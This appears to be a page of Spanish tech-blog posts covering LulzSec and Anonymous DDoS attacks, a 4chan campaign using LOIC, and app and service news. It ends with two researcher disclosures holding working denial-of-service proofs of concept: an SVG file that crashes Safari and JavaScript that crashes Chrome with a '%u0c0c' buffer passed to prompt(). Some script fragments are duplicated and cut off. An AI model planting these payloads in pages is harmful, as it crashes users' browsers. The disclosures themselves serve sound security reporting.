Click sobre la imágen para acceder

Que LulzSec vulnere la seguridad de algún organismo prominente ya no es novedad. Lo ha hecho con Sony (¡y varias veces!), con Nintendo, con el Senado de Estados Unidos… Pero que su blanco haya sido la Agencia Central de Inteligencia (CIA) le da una nueva dimensión. Hace unas horas, el grupo de hackers logró tirar el sitio web de dicho organismo con un ataque de denegación de servicio (DDoS), dejándolo fuera de línea durante un buen rato.

Tras el ataque, la cuenta oficial de WikiLeaks aplaudió el acto, calificando a LulzSec como uno de sus partidarios, culminando con una pequeña frase dedicada para la CIA:

CIA finally learns the real meaning of WTF

Algunos medios destacan que el ataque contra la CIA es considerado como “serio”, debido a las tareas de seguridad nacional que desempeña la agencia. En contraparte, también resaltan que LulzSec no ha liberado ningún paquete con información sustraída durante la intrusión, por lo que se especula que no se sustrajo ningún dato sensible —o por lo menos, no se hizo público el botín—.

Yo me pregunto cómo reaccionará el gobierno de Estados Unidos, toda vez que ya han declarado a este tipo de ataques como actos de guerra. Si bien sólo se trató de sacar del línea un sitio web durante unas horas —un acto más de alarde que de daño real—, dudo mucho que la CIA esté muy contenta después de que LulzSec se haya mofado de ellos en su cara. No creo que saquen los misiles por ahora (después de todo, ¿hacia dónde los apuntas con un ente autónomo y descentralizado?), pero estoy seguro que tendremos noticias a futuro represalias al respecto en algún tribunal.

Vía | ALT1040

Anonymous y **LulzSec son con toda probabilidad los dos grupos hacktivistas más conocidos y nombrados a día de hoy. Ambos con objetivos y propuestas diferentes, tal vez la más obvia sea que Anonymous es más bien un movimiento, un grupo de personas que luchan por una causa común y que actúan anónimamente. Anonymous es cualquiera que se una a esa causa, aunque algunos se empeñen en intentar confundir indicando lo contrario.

LulzSec —abreviatura de Lulz Security— es simplemente un grupo hacker que también se puede considerar hacktivista —intentan castigar a diferentes empresas y corporaciones por sus actos— y que aseguran que están detrás de los ataques a Sony y su Playstation Network e incluso al Senado de los Estados Unidos de América.

Increíblemente hoy se ha sabido que LulzSec estaría atacando a Anonymous, o al menos así lo aseguran vía Twitter. Los primeros ataques se habrían producido en el foro de 4chan.org, que lleva todo el día teniendo problemas de los que se sospecha que LulzSec es responsable. El foro habría sido elegido como objetivo en respuesta a un supuesto hilo en el que se hablaba de entorpecer las actividades de LulzSec, o eso se entiende en el siguiente tweet del grupo:

Hemos visto un hilo en los foros de 4chan donde intentan darnos caza: no os dais cuenta de que somos todo lo que vosotros habéis intentado ser.

Hay que recordar que 4chan es uno de los primeros sitios donde empezó a forjarse el término Anonymous y una de las webs elegidas para hacer llamamientos o incluso coordinar ataques informáticos de denegación de servicios (DDoS).

¿Es éste el comienzo de una “guerra civil” entre ambos grupos? Ninguna célula de Anonymous ha dado respuesta al respecto de los ataques, pero seguramente y en caso de hacerlo, sea para quitarle hierro al asunto. No olvidemos que detrás de LulzSec hay un grupo limitado de personas pero en cambio el colectivo Anonymous es mucho mayor y cualquiera puede unirse a la causa.

Vía | Bitelia

Las medidas tomadas por los usuarios de 4chan atienden, según sus declaraciones, a que Taringa! hace uso de sus memes como si fuesen originales y de su creación. Ésta práctica ha encolerizado a los millones de usuarios que usan a diario el portal y se han plantado para que ésta mala costumbre no se siga repitiendo.

Para realizar el ataque dan todo tipo de información a sus usuarios e incluso les recomiendan el software a utilizar (LOIC). Los ataques de DDoS, por explicarlo de manera muy sencilla, provocan que el servidor se colapse ante el masivo aumento de peticiones y deje de funcionar correctamente. Ya se han tomado acciones similares por otros grupos anónimos de usuarios (Como los realizados por Anonymous contra Irán o Sony).

Vía | Bitelia

Esta vez le toca el turno a Irán y a varios de sus sitios web ya que como han proclamado mañana mismo comienza la llamada “Operación Irán”.

En la nota, que descubro gracias a CNET, se llama a los más respetables y honorables ciudadanos de Irán a entrar en acción el día internacional de los trabajadores y colaborar así con una operación con la que Anonymous planea tumbar varios puntos estratégicos mediante una serie de ataques DoS.

Gente de Irán — vuestros derechos os pertenecen. Tenéis derecho a expresaros libremente y a la libertad de prensa, la libertad de reuniros y de estar seguros, de vivir libres y sin miedo. En el Día Internacional de los Trabajadores Anonymous está con vosotros.

No se dice mucho más sobre los objetivos concretos, pero se cree que Anonymous habría empezado la operación dejado varios mensajes en diferentes sitios web que habían sido atacados por el ciber-ejército iraní. Veremos que pasa mañana.

Vía | Bitelia

Según evoluciona la web y nuestra forma de vida nos vemos más y más ligados a Internet de modo que tan sólo con una conexión a la red es posible acceder a datos que de ninguna otra forma llevaríamos encima, datos en muchas ocasiones críticos.

Un buen día llegas a casa y te dispones a mirar tu correo cuando de repente notas algo raro. La página tarda en cargar. No pasa nada, seguro que es normal. Tras más de 20 segundos esperando, nuestras peores sospechas se confirman: no hay Internet. Entonces por orden realizamos una batería de pruebas para intentar dar con el problema.

Complete Internet Repair nos ayuda con ellas y entre otras cosas es capaz de realizar las siguientes acciones:

• Resetear el protocolo TCP/IP
• Reparar Winsock
• Renovar la conexión a Internet
• Renovar la caché DNS
• Resetear la configuración del Firewall de Windows
• Reparar las conexiones SSL
• Restaurar el archivo hosts
• Reparar los equipos del grupo de trabajo

El uso de la aplicación es muy sencillo. Basta con ejecutar y seleccionar las acciones a realizar de la lista, de manera individual o todas a la vez. Tras iniciar las operaciones podremos ir leyendo el estado de las mismas mediante en la misma ventana mediante un completo log.

Vía | Bitelia

Las primeras admisiones son cuentas estables que desde YouTube explican como “usuarios con trayectoria de cumplir con las reglas de Comunidad del portal”, vamos, que han seleccionado cuidadosamente para que no se les cuele algún “insensato”. También nos podemos imaginar que habrá una pequeña censura a todos aquellos usuarios que algún momento hayan violado los términos de copyright de la web.

Este paso, grande para todos nosotros, también puede ocasionarles más de un problema al portal, ya que habría posibilidad de subidas de vídeos completos, ya sean películas o series, aunque desde Google afirman que este momento es muy propicio, principalmente por los avances en la identificación de contenidos:

Más de 1000 socios a nivel mundial utilizan el Content ID para administrar su contenido en YouTube, incluyendo los principales estudios de cine de Estados Unidos y sellos discográficos. Seguimos tan involucrados como siempre en la construcción y mejora de la tecnología más sofisticada para ayudar a los propietarios de derechos de autor a proteger sus derechos

En cualquier caso y hasta que comiencen a ofrecer a toda la comunidad la posibilidad de vídeos sin límites, iremos recibiendo noticias de aquellos usuarios que ya disfrutan de él.

Vía | Bitelia

fring anunció ayer la posibilidad de hacer llamadas a teléfonos fijos y móviles desde 1 céntimo de euro el minuto. El servicio, que se llama fringOUT está desde ya disponible para móviles Nokia (familia S60) y en las próximas semanas para Android e iOS.

El mercado de las llamadas VOiP sigue estando prácticamente controlado por Skype en estos momentos, con picos diarios de llamadas que alcanzan los 23 millones de usuarios simultáneos y una expansión muy fuerte en los últimos años.

Pero poco a poco más y más competidores se están acercando a esta oportunidad de negocio, lo que podría provocar una tendencia a la baja de las tarifas que hasta ahora se habían mantenido muy estables por la falta de competencia.

Google hizo su introducción hace unas pocas semanas con el lanzamiento de las llamadas a través de GMail y ahora es fring el último en sumarse a la carga, ofreciendo su propio servicio. Hasta hace muy poco se podían realizar llamadas VOiP desde fring a través de la red de Skype, pero tras el lanzamiento de fring para el iPhone 4 dicho acceso quedó bloqueado.

Aunque el precio de las llamadas no es el mismo para todos los países puesto que es “desde” 1 céntimo el minuto, en la propia web de fring podréis encontrar una calculadora de las diferentes tarifas según el país de destino. En concreto, llamar a un móvil en España costará entre 0.11 y 0.14 céntimos el minuto.

Seguro que en el momento en el que lancen las versiones para Android e iOS podremos hacer un mejor análisis de cómo funciona fringOUT. Mientras tanto, si alguno de vosotros tiene un Nokia (series S60) agradeceríamos vuestros comentarios sobre este nuevo servicio, que viene a aportar mayor competencia a un sector que puede resultar estratégico en los próximos años.

Vía | Genbeta

Safari Browser (en windows) es vulnerable siendo propenso a Denegaciones de Servicio, este problema afecta a webkit.dll y se bloquea al tratar de hacer que Safari abra una imagen SGV con un tamaño grande de fuente.

############
versiones
############

Safari para windows 5.0.1 (7533.17.8)
en windows 7 ultimate completamente parcheado.

Safari para windows windows 5.0.1 (7533.17.8)
en windows xp home sp3 completamente parcheado.

############
Línea de tiempo
############

Descubierto:19-08-2010
Notificado al vendedor:25-08-2010
Respuesta del vendedor:26-08-2010
Publicado: 30-09-2010

####################
PoC
####################

Guarda el código como “image.svg” y ábrelo con Safari, mirad como se añaden algunos píxeles “extra” en estilo de la fuente en el tamaño del texto.

################ BOF image.svg ######################

<?xml version=”1.0″?>
<svg xmlns=”http://www.w3.org/2000/svg” width=”200″ height=”200″ version=”1.1″>
<defs>
<mask id=”crash”>
<polygon points=”155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074
220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074
51,121.538 129.666,119.935″
transform=”matrix(1 0 0 1.04643 1.9873e-014 -6.73254)
translate(-52.381 -37.9218)”
style=”fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1″ />
</mask>
</defs>

<g mask=”url(#crash)” style=”font-family:Verdana; font-size: 10pt; fill:red;”>
<text x=”80″ y=”80″ style=”font-size:111000000pt; fill:pink;”>Safari</text>
<text x=”0″ y=”130″ style=”font-size: 60pt; fill:pink;”>Now</text>
<text x=”20″ y=”190″ style=”font-size: 60pt; fill:pink;”>Crash</text>
</g>

</svg>

###############EOF####################

################# €nd ###############

Thnx To cLimbo for his patience and support.

Atentamente:
Lostmon (lostmon@gmail.com)
—
thz Lost

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de “mensajes de alerta” cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
“window manager button” and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=”X-UA-Compatible” content=”chrome=1″>
<h1> wait 10 or 11 seconds </h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds </h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost